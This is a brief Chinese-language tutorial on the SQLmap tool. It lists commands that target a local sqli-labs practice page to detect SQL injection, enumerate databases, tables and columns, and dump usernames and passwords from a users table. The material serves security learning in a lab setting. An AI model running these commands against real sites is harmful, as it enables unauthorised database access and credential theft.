# 若在kail中实验,则协议中需要包含目标主机的真实IP地址.
# 测试过程中需注意phpstudy的版本
# 防火墙可能会导致测试失败
一、SQLmap介绍
1、安装:sqlmap集成在kali中
2、开发语言:python2开发,兼容python3
3、工具作用:
检测是否存在SQL注入
获取数据库数据
获得系统权限
二、具体使用
判断SQL注入是否存在
sqlmap -u "http://localhost/sqli-labs/Less-1/?id=1"
漏洞存在
获得数据
获取库名
获取当前数据库
sqlmap -u "http://localhost/sqli-labs/Less-1/?id=1" --current-db
获取所有数据库
sqlmap -u "http://localhost/sqli-labs/Less-1/?id=1" --dbs
获取表名 ------获取指定数据库的所有表名
sqlmap -u "http://localhost/sqli-labs/Less-1/?id=1" -D security --tables
获取列名
sqlmap -u "http://localhost/sqli-labs/Less-1/?id=1" -D security -T users --columns
获得数据
sqlmap -u "http://localhost/sqli-labs/Less-1/?id=1" -D security -T users -C username,password --dump